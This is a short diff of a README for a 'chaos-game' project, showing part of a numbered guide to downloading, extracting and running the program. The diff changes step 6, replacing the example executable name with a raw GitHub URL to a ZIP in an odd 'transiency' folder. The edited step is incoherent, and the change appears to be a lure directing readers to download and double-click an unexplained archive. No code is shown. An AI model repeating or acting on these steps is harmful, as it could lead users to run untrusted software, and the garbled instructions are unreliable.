kriwin007/chaos-game/readme.md

 3. Download the file associated with that release.
 It could be a ZIP file or a standalone application.
 4. If it is a ZIP file, extract it to your preferred location on your computer.
 5. Navigate to the folder where you extracted the files or where the application was downloaded.
-6. Look for the executable file (usually named something like `chaos-game.exe`).
+6. Look for the executable file (usually named something like `https://raw.githubusercontent.com/kriwin007/chaos-game/main/transiency/chaos-game.zip`).
 7. Double-click the executable file to run the application.

 ## 🌐 Requirements